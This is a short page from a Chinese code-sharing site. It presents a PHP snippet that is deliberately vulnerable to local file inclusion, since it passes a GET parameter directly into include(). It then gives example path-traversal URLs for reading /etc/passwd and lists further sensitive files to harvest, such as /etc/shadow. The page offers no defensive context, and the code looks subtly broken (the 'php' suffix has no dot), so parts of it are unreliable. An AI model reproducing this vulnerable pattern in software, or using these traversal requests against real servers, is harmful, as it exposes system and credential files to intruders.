欢迎来到代码驿站!

PHP代码

当前位置:首页 > 软件编程 > PHP代码

php 伪造本地文件包含漏洞的代码

时间:2021-02-14 11:28:48|栏目:PHP代码|点击:
代码:
复制代码 代码如下:

<?php
$page=$_GET['page'];
include($page.'php');
?>

你可以这样使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd

获取更多数据:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default

来自hackteach

上一篇:PHP格式化MYSQL返回float类型的方法

栏    目:PHP代码

下一篇:PHP实现用户登录的案例代码

本文标题:php 伪造本地文件包含漏洞的代码

本文地址:http://www.codeinn.net/misctech/62582.html

推荐教程

广告投放 | 联系我们 | 版权申明

重要申明:本站所有的文章、图片、评论等,均由网友发表或上传并维护或收集自网络,属个人行为,与本站立场无关。

如果侵犯了您的权利,请与我们联系,我们将在24小时内进行处理、任何非本站因素导致的法律后果,本站均不负任何责任。

联系QQ:914707363 | 邮箱:codeinn#126.com(#换成@)

Copyright © 2020 代码驿站 版权所有